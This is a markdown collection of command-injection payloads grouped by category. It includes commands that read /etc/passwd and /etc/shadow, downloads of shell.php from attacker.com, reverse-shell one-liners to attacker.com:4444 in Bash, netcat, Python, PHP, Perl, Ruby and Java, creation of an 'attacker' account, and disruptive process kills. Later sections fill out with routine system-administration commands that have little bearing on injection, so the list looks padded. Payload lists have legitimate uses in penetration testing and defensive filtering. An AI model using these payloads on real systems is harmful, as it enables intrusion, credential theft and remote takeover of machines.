# Command Injection Payloads

## Basic Command Injection
; ls -la
| cat /etc/passwd
`id`
$(whoami)
|| ping -c 5 127.0.0.1
&& sleep 5

## Unix/Linux Commands
; uname -a
| cat /etc/hosts
`ls -la /home`
$(cat /etc/shadow)
|| ifconfig
&& netstat -an

## Windows Commands
& ipconfig
| net user
`systeminfo`
$(tasklist)
|| dir
&& ping 127.0.0.1

## File System Access
; cat /etc/passwd
| head -n 10 /etc/shadow
`tail -f /var/log/auth.log`
$(find / -name "*.conf" 2>/dev/null)
|| ls -la /root
&& cat /proc/version

## Network Commands
; ping -c 5 attacker.com
| nslookup attacker.com
`dig attacker.com`
$(curl http://attacker.com/shell.php)
|| wget http://attacker.com/shell.php
&& nc -zv attacker.com 4444

## Reverse Shells
### Bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1
0<&196;exec 196<>/dev/tcp/attacker.com/4444; sh <&196 >&196 2>&196

### Netcat
nc -e /bin/sh attacker.com 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f

### Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

### PHP
php -r '$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

### Perl
perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

### Ruby
ruby -rsocket -e'f=TCPSocket.open("attacker.com",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

### Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attacker.com/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

## File Upload
; wget http://attacker.com/shell.php -O /tmp/shell.php
| curl -o /tmp/shell.php http://attacker.com/shell.php
`fetch -o /tmp/shell.php http://attacker.com/shell.php`
$(axel -n 10 -o /tmp/shell.php http://attacker.com/shell.php)

## Information Gathering
; cat /proc/cpuinfo
| cat /proc/meminfo
`df -h`
$(free -m)
|| uptime
&& whoami

## Process Manipulation
; ps aux
| kill -9 1
`pkill -f apache`
$(killall sshd)
|| service apache2 restart
&& systemctl restart nginx

## User Management
; cat /etc/passwd
| grep -v nologin /etc/passwd
`getent passwd`
$(cut -d: -f1 /etc/passwd)
|| useradd attacker
&& passwd attacker

## Privilege Escalation
; sudo -l
| find / -perm -4000 2>/dev/null
`getcap -r / 2>/dev/null`
$(cat /etc/sudoers)
|| su root
&& sudo su

## Network Scanning
; nmap -sS -sV attacker.com
| netstat -tulpn
`ss -tulpn`
$(arp -a)
|| route -n
&& iptables -L

## DNS Enumeration
; dig ANY @ns1.example.com example.com
| host -t mx example.com
`nslookup -type=any example.com`
$(dnsenum example.com)
|| fierce -dns example.com

## Web Application Testing
; curl -X POST http://example.com/login -d "user=admin&pass=password"
| wget --post-data "user=admin&pass=password" http://example.com/login
`httrack http://example.com`
$(nikto -h http://example.com)

## Database Access
; mysql -u root -p
| psql -U postgres
`mongod --dbpath /data/db`
$(redis-cli)
|| sqlite3 database.db

## Encryption/Decryption
; openssl enc -aes-256-cbc -salt -in file.txt -out file.enc
| gpg --encrypt file.txt
`base64 file.txt`
$(md5sum file.txt)
|| sha256sum file.txt

## Compression
; tar -czf archive.tar.gz directory/
| zip -r archive.zip directory/
`7z a archive.7z directory/`
$(rar a archive.rar directory/)
|| gzip file.txt

## Log Manipulation
; tail -f /var/log/apache2/access.log
| grep "password" /var/log/auth.log
`journalctl -u apache2`
$(dmesg | tail -20)
|| last -10

## Scheduled Tasks
; crontab -l
| at -l
`systemctl list-timers`
$(ls -la /etc/cron.*/)
|| cat /etc/crontab

## Environment Variables
; env
| printenv
`set`
$(echo $PATH)
|| export PATH=/tmp:$PATH

## Shell Configuration
; cat ~/.bashrc
| source ~/.bash_profile
`. ~/.profile`
$(alias)
|| history

## System Information
; cat /etc/os-release
| uname -r
`hostname`
$(domainname)
|| dmesg | grep Linux

## Hardware Information
; lspci
| lsusb
`lshw`
$(dmidecode)
|| hwinfo

## Disk Information
; fdisk -l
| parted -l
`lsblk`
$(blkid)
|| mount

## Memory Information
; free -h
| vmstat
`top -n 1`
$(htop)
|| glances

## Network Interfaces
; ifconfig
| ip addr
`ip link`
$(netstat -i)
|| route

## Firewall Rules
; iptables -L
| ufw status
`firewalld-cmd --list-all`
$(nft list ruleset)
|| pfctl -s rules

## Security Tools
; lynis audit system
| rkhunter --check
`chkrootkit`
$(tripwire --check)
|| aide --check

## End of File